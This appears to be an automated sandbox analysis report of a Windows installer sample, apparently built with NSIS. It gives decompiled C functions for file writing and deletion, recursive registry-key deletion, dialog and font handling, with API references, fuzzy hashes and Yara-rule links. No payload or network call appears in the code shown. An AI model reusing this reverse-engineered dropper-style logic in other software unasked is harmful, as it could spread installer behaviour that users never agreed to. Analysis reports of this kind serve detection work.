                  C-Code - Quality: 86%
                  			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AC6(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C35(_t50);
				_t26 = E00405C5A(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424738;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032CA(_t45);
						E004032B4(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C15( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D01( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                  0x004027df
                  0x004027e1
                  0x004027ed
                  0x004027f0
                  0x004027fa
                  0x004027fe
                  0x004027fe
                  0x00402804
                  0x00402811
                  0x00402819
                  0x0040281c
                  0x00402822
                  0x00402830
                  0x00402835
                  0x00402839
                  0x0040283c
                  0x00402845
                  0x00402851
                  0x00402855
                  0x00402858
                  0x00402862
                  0x00402887
                  0x00402869
                  0x0040286e
                  0x00402876
                  0x0040287c
                  0x00402881
                  0x00402881
                  0x0040288e
                  0x0040288e
                  0x0040289b
                  0x004028a1
                  0x004028b3
                  0x004028b3
                  0x004028b9
                  0x004028b9
                  0x004028c4
                  0x004028c5
                  0x004028c9
                  0x004028cd
                  0x004028d3
                  0x004028d3
                  0x004028da
                  0x004022dd
                  0x00402a5d
                  0x00402a69

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                  • GlobalFree.KERNEL32 ref: 0040288E
                  • GlobalFree.KERNEL32 ref: 004028A1
                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                  • String ID:
                  • API String ID: 2667972263-0
                  • Opcode ID: ee4a68396c29b08b741c613ff754ff0f0653b24d2e102e37bfb1fe53aeee4bcb
                  • Instruction ID: 07af861edfd5d45cc772d4460453d41526fe3ac71611944f2ada717c13252223
                  • Opcode Fuzzy Hash: ee4a68396c29b08b741c613ff754ff0f0653b24d2e102e37bfb1fe53aeee4bcb
                  • Instruction Fuzzy Hash: 83218D72800128BBDF217FA5CE48D9E7E79EF09364F10423EF551762D1C67949418FA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040498E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E0040498E(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00406154(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00406154(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00406154(_t41, _t47, 0x420d28, 0x420d28, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d28), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423ef8, _a4, 0x420d28);
			}



















                  0x00404994
                  0x00404999
                  0x004049a1
                  0x004049a2
                  0x004049af
                  0x004049b7
                  0x004049b8
                  0x004049ba
                  0x004049bc
                  0x004049be
                  0x004049c1
                  0x004049c1
                  0x004049c8
                  0x004049ce
                  0x004049ce
                  0x004049d5
                  0x004049dc
                  0x004049df
                  0x004049e2
                  0x004049e2
                  0x004049e6
                  0x004049f6
                  0x004049f8
                  0x004049fb
                  0x004049a4
                  0x004049a4
                  0x004049ab
                  0x004049ab
                  0x00404a03
                  0x00404a0e
                  0x00404a24
                  0x00404a34
                  0x00404a50

                  APIs
                  • lstrlenA.KERNEL32(00420D28,00420D28,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048A9,000000DF,00000000,00000400,?), ref: 00404A2C
                  • wsprintfA.USER32 ref: 00404A34
                  • SetDlgItemTextA.USER32 ref: 00404A47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ItemTextlstrlenwsprintf
                  • String ID: %u.%u%s%s$(B
                  • API String ID: 3540041739-1796307841
                  • Opcode ID: 7464479753e629812bdf3700d903353588bc249d3655e79db3f03f4f51d42954
                  • Instruction ID: 1301199a10d6bfa0f795ae51e8cceb2c664c9f74d195b05cdaf9af1bfefcf64c
                  • Opcode Fuzzy Hash: 7464479753e629812bdf3700d903353588bc249d3655e79db3f03f4f51d42954
                  • Instruction Fuzzy Hash: 7A11B7B36041286BEB0066799C46EAF32D9DB85374F250237FA26F61D1E9788C5281A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 48%
                  			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F47(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004064CA(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                  0x00402cdb
                  0x00402ce4
                  0x00402ced
                  0x00402cf9
                  0x00402d02
                  0x00402d0c
                  0x00402d31
                  0x00402d37
                  0x00402d3c
                  0x00402d3d
                  0x00402d6d
                  0x00402d46
                  0x00402d48
                  0x00402d98
                  0x00402d9b
                  0x00000000
                  0x00402da1
                  0x00402d57
                  0x00402d5c
                  0x00402d5e
                  0x00000000
                  0x00000000
                  0x00402d66
                  0x00402d6b
                  0x00402d6c
                  0x00402d6c
                  0x00402d79
                  0x00402d81
                  0x00402d88
                  0x00000000
                  0x00402db1
                  0x00000000
                  0x00402d90
                  0x00402d1c
                  0x00402d2f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402d2f
                  0x00402db7

                  APIs
                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CloseEnum$DeleteValue
                  • String ID:
                  • API String ID: 1354259210-0
                  • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                  • Instruction ID: 479b5507277e1ed98100a043d195c8e3d67278c142fcba22c9f5c581f71d1c0c
                  • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                  • Instruction Fuzzy Hash: DE215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B48E94AA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424720,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E0040601F();
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                  0x00401d65
                  0x00401d69
                  0x00401d7e
                  0x00401d6b
                  0x00401d6d
                  0x00401d73
                  0x00401d73
                  0x00401d84
                  0x00401d87
                  0x00401d91
                  0x00401d94
                  0x00401d9c
                  0x00401dad
                  0x00401db0
                  0x00401dbb
                  0x00401db2
                  0x00401db4
                  0x00401db4
                  0x00401dbf
                  0x00401dcc
                  0x00401df3
                  0x00401e02
                  0x00401e10
                  0x00401e18
                  0x00401e20
                  0x00401e20
                  0x00401e29
                  0x00401e2f
                  0x004029a5
                  0x004029a5
                  0x00402a5d
                  0x00402a69

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                  • String ID:
                  • API String ID: 1849352358-0
                  • Opcode ID: 92fb06419dcf22d7c561d1c1cd7314035e184999ef60ddcb5701d42bd4b0d5ab
                  • Instruction ID: 377f1368a79285744d6b6cf0b5e74a57d9b5ac4df0fb29ad0ac025f91be5ae75
                  • Opcode Fuzzy Hash: 92fb06419dcf22d7c561d1c1cd7314035e184999ef60ddcb5701d42bd4b0d5ab
                  • Instruction Fuzzy Hash: C8212872A00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b808->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b818 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b81f = 1;
				 *0x40b81c = _t15 & 0x00000001;
				 *0x40b81d = _t15 & 0x00000002;
				 *0x40b81e = _t15 & 0x00000004;
				E00406154(_t9, _t31, _t33, 0x40b824,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b808);
				_push(_t18);
				_push(_t33);
				E0040601F();
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                  0x00401e35
                  0x00401e40
                  0x00401e42
                  0x00401e4f
                  0x00401e66
                  0x00401e6b
                  0x00401e78
                  0x00401e7d
                  0x00401e81
                  0x00401e8c
                  0x00401e93
                  0x00401ea5
                  0x00401eab
                  0x00401eb0
                  0x00401eba
                  0x00402620
                  0x00401569
                  0x004029a5
                  0x00402a5d
                  0x00402a69

                  APIs
                  • GetDC.USER32(?), ref: 00401E38
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                  • ReleaseDC.USER32 ref: 00401E6B
                  • CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CapsCreateDeviceFontIndirectRelease
                  • String ID:
                  • API String ID: 3808545654-0
                  • Opcode ID: dbc41a527304c6fe7c4bbb0ed52bde6d70f826071420a725491f8bf133d98c2a
                  • Instruction ID: 57a26ad33cd6426129b0cba3998c620b955dd558a32440fd51a8b23e498893f8
                  • Opcode Fuzzy Hash: dbc41a527304c6fe7c4bbb0ed52bde6d70f826071420a725491f8bf133d98c2a
                  • Instruction Fuzzy Hash: 3E019672500240AFE7007BB0AE4A7997FF8D755301F108839F241B62F2C67800458BAC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E0040601F();
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                  0x00401c2e
                  0x00401c30
                  0x00401c37
                  0x00401c3a
                  0x00401c3d
                  0x00401c47
                  0x00401c4b
                  0x00401c4e
                  0x00401c57
                  0x00401c57
                  0x00401c5a
                  0x00401c5e
                  0x00401c67
                  0x00401c67
                  0x00401c6a
                  0x00401c6e
                  0x00401c70
                  0x00401cc5
                  0x00401cc7
                  0x00401cd0
                  0x00401cd8
                  0x00401cdb
                  0x00401cdb
                  0x00401ce4
                  0x00000000
                  0x00401c72
                  0x00401c79
                  0x00401c7b
                  0x00401c7e
                  0x00401c84
                  0x00401c8b
                  0x00401c8e
                  0x00401cb6
                  0x00401cea
                  0x00401cea
                  0x00401c90
                  0x00401c9e
                  0x00401ca6
                  0x00401ca9
                  0x00401ca9
                  0x00401c8e
                  0x00401ced
                  0x00401cf0
                  0x00401cf6
                  0x004029a5
                  0x004029a5
                  0x00402a5d
                  0x00402a69

                  APIs
                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$Timeout
                  • String ID: !
                  • API String ID: 1777923405-2657877971
                  • Opcode ID: 7b70566c870daa96221156bf416f9a378a332c342d8049e94ba7da889c6dd66f
                  • Instruction ID: 51da54adcba92585663a26c7e1368d4a3271239daaedb1c2ef7502cbfef702b9
                  • Opcode Fuzzy Hash: 7b70566c870daa96221156bf416f9a378a332c342d8049e94ba7da889c6dd66f
                  • Instruction Fuzzy Hash: 05216071A44208BEEB059FB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405B47, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E00405B47(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060C1(0x422130, _a4);
				_t21 = E00405AF2(0x422130);
				if(_t21 != 0) {
					E0040639C(_t21);
					if(( *0x42473c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422130;
						while(1) {
							_t11 = lstrlenA(0x422130);
							_push(0x422130);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406435();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AA0(0x422130);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A59();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                  0x00405b53
                  0x00405b5e
                  0x00405b62
                  0x00405b69
                  0x00405b75
                  0x00405b81
                  0x00405b81
                  0x00405b99
                  0x00405b9a
                  0x00405ba1
                  0x00405ba2
                  0x00000000
                  0x00000000
                  0x00405b85
                  0x00405b8c
                  0x00405b94
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405b8c
                  0x00405ba4
                  0x00000000
                  0x00405bb8
                  0x00405b77
                  0x00405b7b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405b7b
                  0x00405b64
                  0x00000000

                  APIs
                    • Part of subcall function 004060C1: lstrcpynA.KERNEL32(?,?,00000400,004033E4,00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004060CE
                    • Part of subcall function 00405AF2: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,?,00405B5E,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                    • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B05
                    • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B19
                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst2F82.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BAA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nst2F82.tmp
                  • API String ID: 3248276644-3645657791
                  • Opcode ID: 833d5d7d4d88ab044a5975486a6ace5c2f1c8b1622a9b4308b288e25f9abd96d
                  • Instruction ID: e51454695f06d4bf62575f1f71cc8d9d2da662beaff56aa2e5751c7b88ff0260
                  • Opcode Fuzzy Hash: 833d5d7d4d88ab044a5975486a6ace5c2f1c8b1622a9b4308b288e25f9abd96d
                  • Instruction Fuzzy Hash: 47F02835601E6029C622223A0C45BAF3A65CE8232474D013FFC51B52C2DB3CB943DE6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405A59, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405A59(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                  0x00405a5a
                  0x00405a71
                  0x00405a79
                  0x00405a79
                  0x00405a81

                  APIs
